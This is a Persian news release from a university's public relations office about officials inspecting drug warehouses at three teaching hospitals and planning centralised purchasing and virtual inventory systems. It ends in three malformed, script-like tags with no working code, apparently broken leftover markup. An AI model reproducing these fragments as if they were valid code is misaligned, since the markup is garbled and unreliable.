در مراکز آموزشی و درمانی استان انجام شد:

بازدید معاون توسعه مدیریت و نابع دانشگاه از انبارهای دارویی مراکز آموزشی درمانی مرکز استان

معاون توسعه مدیریت و منابع دانشگاه از انبارهای داوریی مراکز آموزشی درمانی بهشتی، فرشچیان سینا و فاطمیه بازدید کرد.

به گزارش روابط عمومی معاونت توسعه مدیریت و منابع دانشگاه مهندس بهروز رحیمی معاون توسعه به همراهی دکتر خدادادی معاون غذا و دارو و دیگر مدیران حوزه ستادی دانشگاه از انبارهای داوریی مراکز آموزشی درمانی سینا، بهشتی و فاطمیه بازدید کرد.

در این بازدید با هدف بررسی مشکلات فیزیکی انبارهای دارویی و نحوه خرید و توزیع دارو در مراکز درمانی مذکور انجام شد.

معاون توسعه مدیریت و منابع دانشگاه ضمن اشاره به خرید هدفمند داروها و ملزومات مصرفی حیاتی و استراتژیک اظهار داشت: خرید هدفمند داروها و ملزومات مصرفی حیاتی و استراتژیک دانشگاه همانند سال گذشته برای ۹ تا ۱۲ ماه درسال جاری انجام خواهد شد.

مهندس بهروز رحیمی ضمن اشاره به اهمیت نظام نوین انبار داری بیان کرد: انبارداری نوین باید در انبارهای دارویی، تجهیزات و ملزومات مصرفی پزشکی استان اجرایی شود چرا که این روش باعث کنترل منابع و مصارف و از هدر رفت آن جلوگیری خواهد شد.

مهندس رحیمی ضمن تاکید بر تداوم حرکت مجموعه دانشگاه به سوی تحقق اقتصاد مقاومتی، به بررسی راهکارهای کلیدی برای تامین اصولی و خرید دارویی به روش متمرکز، شفاف ‌سازی قیمت دارو و نیز نحوه انبار کردن آن در انبار مرکزی دانشگاه و بیمارستان‌ها اشاره کرد و افزود: دارو و توزیع آن در مراکز بهداشتی و درمانی باید با دقت بیشتری صورت گیرد.

وی افزود: با نظارت جدی بر نحوه مصرف داروهای حیاتی در بیمارستان ها، می‌توان خدمات بهتری را به مددجویان در بیمارستان ها و مراکز درمانی ارائه کرد. تمامی این موارد همانند سال گذشته از طریق سیستم سرپرست مدیریت زنجیره خرید و توزیع داروهای استراتژیک قابل انجام خواهد بود.

دکترایرج خدادادی تجهیز مراکز بهداشتی درمانی به انبارهای مجازی دارویی را راهکاری موثر معرفی کرد و افزود: داروهای موجود در انبارهای مجازی قابل رصد هستند و مراکز بهداشتی درمانی می‌توانند هم داروهای موجود و هم اقلام دارویی مورد نیاز خود را در آن ثبت کنند.

وی ادامه داد: بدین ترتیب نیازهای دارویی ثبت شده توسط مراکز متقاضی دارو، به صورت سیستماتیک و توسط انبار مرکزی دانشگاه تامین می‌شوند و از خریدهای مستقل پیشگیری می‌شود. این روش گام مهمی است که از طریق آن می‌توانیم روند تهیه و توزیع دارو را به شکل دقیقی مدیریت و از انباشته شدن یا منقضی شدن دارو جلوگیری کنیم.

در پایان موجودی برخی داروها و ملزومات مصرفی در انبارهای مراکز آموزشی درمانی یاد شده مورد بررسی قرار گرفت و بر دقت بیشتر در به روز رسانی موجودی انبارها، تاکید شد.<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>